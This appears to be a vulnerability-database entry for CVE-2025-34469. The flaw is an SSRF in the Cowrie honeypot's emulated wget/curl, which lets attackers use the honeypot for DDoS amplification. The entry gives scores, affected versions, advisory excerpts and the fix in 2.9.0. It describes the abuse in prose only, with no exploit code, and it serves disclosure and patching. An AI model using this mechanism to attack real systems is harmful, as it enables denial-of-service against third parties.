CVE-2025-34469
published 2025-12-31CVE-2025-34469: Cowrie versions prior to 2.9.0 contain a server-side request forgery (SSRF) vulnerability in the emulated shell implementation of wget and curl. In the default…
PriorityP180high7.5CVSS 3.1
AVNACLPRNUINSUCNINAH
ITWVulnCheck KEV
Exploited in the wild
EPSS
0.62%
45.0th percentile
Cowrie versions prior to 2.9.0 contain a server-side request forgery (SSRF) vulnerability in the emulated shell implementation of wget and curl. In the default emulated shell configuration, these command emulations perform real outbound HTTP requests to attacker-supplied destinations. Because no outbound request rate limiting was enforced, unauthenticated remote attackers could repeatedly invoke these commands to generate unbounded HTTP traffic toward arbitrary third-party targets, allowing the Cowrie honeypot to be abused as a denial-of-service amplification node and masking the attacker’s true source address behind the honeypot’s IP.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cowrie | cowrie | < 2.9.0 | 2.9.0 |
| cowrie | cowrie | >= 0 < 2.9.0 | 2.9.0 |
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
nvdv4.06.9MEDIUMCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck6.9MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Cowrie has a SSRF vulnerability in wget/curl emulation enabling DDoS amplification
osv·2025-12-20
CVE-2025-34469 [MEDIUM] Cowrie has a SSRF vulnerability in wget/curl emulation enabling DDoS amplification
Cowrie has a SSRF vulnerability in wget/curl emulation enabling DDoS amplification
### Summary
A Server-Side Request Forgery (SSRF) vulnerability in Cowrie's emulated shell mode allows unauthenticated attackers to abuse the honeypot as an amplification vector for HTTP-based denial-of-service attacks against arbitrary third-party hosts.
### Details
When Cowrie operates in emulated shell mode (the default configuration), it basically emulates common Linux commands. The `wget` and `curl` command emulations actually perform real outbound HTTP requests to the destinations specified by the attacker, as this functionality is intended to allow Cowrie to save downloaded files for later inspection.
An attacker who connects to the honeypot via SSH or Telnet can repeatedly invoke these commands t
GHSA
Cowrie has a SSRF vulnerability in wget/curl emulation enabling DDoS amplification
ghsa·2025-12-20
CVE-2025-34469 [MEDIUM] CWE-918 Cowrie has a SSRF vulnerability in wget/curl emulation enabling DDoS amplification
Cowrie has a SSRF vulnerability in wget/curl emulation enabling DDoS amplification
### Summary
A Server-Side Request Forgery (SSRF) vulnerability in Cowrie's emulated shell mode allows unauthenticated attackers to abuse the honeypot as an amplification vector for HTTP-based denial-of-service attacks against arbitrary third-party hosts.
### Details
When Cowrie operates in emulated shell mode (the default configuration), it basically emulates common Linux commands. The `wget` and `curl` command emulations actually perform real outbound HTTP requests to the destinations specified by the attacker, as this functionality is intended to allow Cowrie to save downloaded files for later inspection.
An attacker who connects to the honeypot via SSH or Telnet can repeatedly invoke these commands t
VulnCheck
Cowrie Unrestricted wget/curl Emulation SSRF-Based DDoS Amplification
vulncheck·2025·CVSS 6.9
CVE-2025-34469 [MEDIUM] Cowrie Unrestricted wget/curl Emulation SSRF-Based DDoS Amplification
Cowrie Unrestricted wget/curl Emulation SSRF-Based DDoS Amplification
Cowrie versions prior to 2.9.0 contain a server-side request forgery (SSRF) vulnerability in the emulated shell implementation of wget and curl. In the default emulated shell configuration, these command emulations perform real outbound HTTP requests to attacker-supplied destinations. Because no outbound request rate limiting was enforced, unauthenticated remote attackers could repeatedly invoke these commands to generate unbounded HTTP traffic toward arbitrary third-party targets, allowing the Cowrie honeypot to be abused as a denial-of-service amplification node and masking the attacker’s true source address behind the honeypot’s IP.
Affected: Cowrie Cowrie
Required Action: Apply remediations or mitigations per vend
No detection rules found.
No public exploits indexed.
https://github.com/advisories/GHSA-83jg-m2pm-4jxjhttps://github.com/cowrie/cowrie/issues/2622https://github.com/cowrie/cowrie/pull/2800https://github.com/cowrie/cowrie/releases/tag/v2.9.0https://www.vulncheck.com/advisories/cowrie-unrestricted-wget-curl-emulation-enables-ssrf-based-ddos-amplificationhttps://github.com/advisories/GHSA-83jg-m2pm-4jxj
2025-12-31
Published
Exploited in the wild